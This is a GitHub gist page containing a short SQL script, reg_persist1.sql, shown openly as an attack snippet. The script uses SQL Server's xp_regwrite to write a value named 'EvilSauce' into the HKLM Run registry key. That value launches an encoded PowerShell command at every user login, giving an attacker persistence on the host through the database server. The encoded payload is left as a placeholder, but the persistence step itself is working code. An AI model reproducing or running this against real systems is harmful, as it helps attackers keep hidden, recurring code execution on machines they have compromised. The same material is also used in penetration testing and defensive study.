Skip to content

Instantly share code, notes, and snippets.

@nullbind

nullbind/reg_persist1.sql

Last active September 16, 2019 04:58
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save nullbind/f9c46a4793d07904996f9dc82d9c66b2 to your computer and use it in GitHub Desktop.
Save nullbind/f9c46a4793d07904996f9dc82d9c66b2 to your computer and use it in GitHub Desktop.
Download ZIP
Use SQL Server xp_regwrite to configure a file to run when users login
Raw
reg_persist1.sql
---------------------------------------------
-- Use SQL Server xp_regwrite to configure
-- a file to execute ps encoded command when users login
----------------------------------------------
EXEC master..xp_regwrite
@rootkey = 'HKEY_LOCAL_MACHINE',
@key = 'Software\Microsoft\Windows\CurrentVersion\Run',
@value_name = 'EvilSauce',
@type = 'REG_SZ',
@value = '"PowerShell -ENC <encodedcommand>"'
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment